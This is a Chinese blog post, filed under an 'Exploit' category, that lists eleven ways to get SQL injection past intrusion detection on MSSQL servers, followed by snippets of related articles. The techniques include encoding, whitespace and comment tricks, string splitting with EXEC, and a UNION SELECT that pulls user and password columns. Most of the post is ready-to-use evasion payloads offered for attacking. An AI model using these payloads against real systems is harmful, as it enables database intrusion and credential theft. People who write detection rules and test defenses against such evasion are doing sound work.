SQL Injection规避入侵检测技术总结

最新推荐文章于 2019-05-26 11:38:22 发布
最新推荐文章于 2019-05-26 11:38:22 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: Exploit 文章标签: sql hex 服务器
当我们对一个运行IDS系统的服务器进行SQL注射时,我们往往会遇到很大的麻烦,因为我们的注射语句被过滤了,如何规避这种检测手段就成了一门新的技术,本文就对此规避技术提出十一条思路和方法,与大家商戳。

一、 运用编码技术绕过,如URLEncode编码,ASCII编码绕过。

       如or 1=1即%6f%72%20%31%3d%31
   
       Test即CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)
   
二、 通过空格绕过

       如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如or’swords’=‘swords’,由于mssql的松散性,我们可以把or ‘swords’之间的空格去掉,并不影响运行。
   
三、 运用字符串判断代替经典的or 1=1判断绕过

       如or ‘swords’=‘swords’
   
四、 通过类型转换修饰符N绕过

       如or ‘swords’ = N’swords’,大写的N告诉mssql server 字符串作为nvarchar类型,它起到类型转换的作用,并不影响注射语句本身,但是可以避过基于知识的模式匹配IDS。
   
五、 通过+号拆解字符串绕过,
   
       如 or ‘swords’=‘sw’+’ords’;EXEC(‘IN’+’SERT INTO ‘+’…..’)
   
六、 通过LIKE绕过,如or ‘swords’ LIKE ‘sw’
   
七、 通过IN绕过,如or ‘swords’ IN (‘swords’)
   
八、 通过BETWEEN绕过, 如or ‘swords’ BETWEEN ‘rw’ AND ‘tw’
   
九、 通过>或者<绕过,如
   
       or ‘swords’>‘sw’
   
       or ‘swords’<‘tw’
       
       or 1<3
   
十、 运用注释语句绕过:
   
       用/**/代替空格,如:
   
       UNION /**/ SELECT /**/user,pwd,from tbluser
   
       用/**/分割敏感词,如:
   
       U/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser
   
十一、 用HEX绕过,一般的IDS都无法检测出来。
   
       0x730079007300610064006D0069006E00 =hex(sysadmin)
   
       0x640062005F006F0077006E0065007200 =hex(db_owner)
   
       以上的十一条SQL Injection规避入侵检测技术供您参考。 

hankwangwang
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[转载]《SQL Injection规避入侵检测技术总结》 邪恶八进制信息安全团队官方讨论组 努力为祖国的信息安全撑起一片蓝天 - EvilOctal Security Team - E_S_T.htm
08-22
[转载]《SQL Injection规避入侵检测技术总结》 邪恶八进制信息安全团队官方讨论组 努力为祖国的信息安全撑起一片蓝天 - EvilOctal Security Team - E_S_T.htm[转载]《SQL Injection规避入侵检测技术总结》 邪恶八进制信息安全团队官方讨论组 努力为祖国的信息安全撑起一片蓝天 - EvilOctal Security Team - E_S_T.htm
关于输入校验(Input valiation)和SQL注入(SQL injection)
Mike的专栏
12-23 5190
要防SQL注入就要了解所有可能的SQL注入. 个人认为不存在验证层一说. 这个属于输入校验Input validation. 应该与各页面结合起来. 同时使用客户端验证和服务器端验证. 之所以要同时用客户端和服务器端验证, 客户端验证是为了减少向服务器提交的次数, 服务器端验证是为了安全, 因为黑客可以绕过Javascript等向服务器提交非法数据. 所有需要输入的地方, 包括web form中每
代码安全缺陷分析
java、c++、机器学习方向King
01-03 5082
安全缺陷种类 本次测试涵盖各类常见安全缺陷。根据缺陷形成的原因、被利用的可能性、造成的危害程度和解决的难度等因素进行综合考虑,可以将常见的安全缺陷分为八类: 1、输入验证与表示(Input Validation and Representation) 输入验证与表示问题通常是由特殊字符、编码和数字表示所引起的,这类问题的发生是由于对输入的信任所造成的。这些问题包括:缓冲区溢出、跨
SQL Injection with MySQL 注入分析
09-14
技术允许攻击者通过输入恶意SQL代码来操纵或获取数据库中的敏感信息。本文将深入探讨MySQL数据库的SQL注入问题,以及如何在PHP环境中进行注入攻击。 在PHP+MySQL的场景下,SQL注入通常是由于不安全的用户输入处理...
SQL Injection(SQL注入)介绍及SQL Injection攻击检测工具.docx
01-10
4. **SQL注入检测工具** - 为了发现潜在的SQL注入漏洞,开发者可以使用自动化工具,如Nessus、Acunetix、Burp Suite、SQLMap等,它们能够扫描应用程序的输入点,尝试模拟攻击行为,找出可能的安全漏洞。 5. **最佳...
advanced_sql_injection.rar_sql injection
最新发布
09-24
how to prevent sql injection attack
记一次成功的sql注入入侵检测附带sql性能优化
01-19
如是我通过网站目录仔细排查将通过fck上传的网马删除并修补fck的上传漏洞并记下了这篇 Fckeditor使用笔记 ,其实很多人都遇到过,也解决过,都是小问题,但是让你老板明白比解决漏洞问题更蛋疼,我那解释的叫一个汗...
防止SQL注入的五种方法
热门推荐
路漫漫~
05-09 4万+
一、SQL注入简介 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。     SQL注入是比较常见的
分享几种绕过防注入的方法
weixin_30598225的博客
01-23 293
1、运用编码技术绕过如URLEncode编码,ASCII编码绕过。例如or 1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。 2、通过空格绕过如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如or' swords' ='swords',由于mssql的松散性,我们可以把or 'sword...
注入限制绕过<转>
weixin_30760895的博客
08-20 64
突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“'”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好…… 经过我的收集,大部分的防注入程序都过滤了以下关键字: and | select | update | chr | delete | ...
防注入绕过(精讲)
Coisini的博客
05-26 1647
路过这个网站,检测了一下. http://www.xxx.cn/Article.asp?ID=117 and 1=1 直接返回主页 http://www.xxx.cn/Article.asp?ID=117 or 1=1 直接返回主页 http://www.xxx.cn/Article.asp?ID=117 or 没有返回主页 没有过滤or http://www.xxx.cn/Article.asp...
SQL注入过滤限制绕过方法
weixin_30879169的博客
04-28 1228
突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好…… 经过我的收集,大部分的防注入程序都过滤了以下关键字: and | select | update | chr | delete ...
关于突破SQL注入限制的新思路
天元喜羊羊的博客
08-04 1724
http://www.bitscn.com/network/protect/200804/139215.html 突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好…… 
char码值对应列表大全
qq_30054961的博客
09-06 2万+
Char(“0”) 为0的字符 Char(“1”) Char(“2”) Char(“3”) Char(“4”) Char(“5”) Char(“6”) Char(“7”) 响铃 Char(“8”) 回格 Char(“9”) tab(水平制表符) Char(“10”) 换行 Char(“11”) tab(垂直制表符) Char(“12”) 换页 Char(“13...
Fortify扫描 -- 软件安全错误的分类
weixin_34289454的博客
12-10 4652
软件安全错误分类 Input Validation and Representation: 输入验证和表示 API Abuse: API滥用 Security Features: 安全功能 Time and State: 时间和国家 Errors: 错误 Code Quality: 代码质量 Encapsulation: 封装 1 Input Validation and Represen...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值